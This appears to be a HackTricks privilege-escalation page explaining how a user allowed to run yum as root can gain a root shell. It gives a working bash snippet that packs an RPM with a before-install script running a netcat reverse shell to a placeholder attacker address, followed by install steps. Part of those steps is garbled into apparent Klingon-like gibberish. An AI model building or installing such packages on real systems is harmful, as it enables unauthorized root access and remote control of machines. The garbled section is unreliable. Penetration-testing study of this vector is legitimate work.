hacktricks/linux-unix/privilege-escalation/exploiting-yum.md
2024-02-10 17:52:19 +00:00

3.6 KiB

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Further examples around yum can also be found on gtfobins.

Executing arbitrary commands via RPM Packages

Checking the Environment

In order to leverage this vector the user must be able to execute yum commands as a higher privileged user, i.e. root.

A working example of this vector

A working example of this exploit can be found in the daily bugle room on tryhackme.

Packing an RPM

In the following section, I will cover packaging a reverse shell into an RPM using fpm.

The example below creates a package that includes a before-install trigger with an arbitrary script that can be defined by the attacker. When installed, this package will execute the arbitrary command. I've used a simple reverse netcat shell example for demonstration but this can be changed as necessary.

EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR

qetlh yIqIm

vaj vItlhutlh yum Hoch 'ej Hoch-ghItlhvam user vay'.

  1. rpm vItlhutlh host
  2. ghItlh netcat listener ghItlh netcat listener vay'
  3. yI'el vulnerable package yum localinstall -y exploited-1.0-1.noarch.rpm
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks: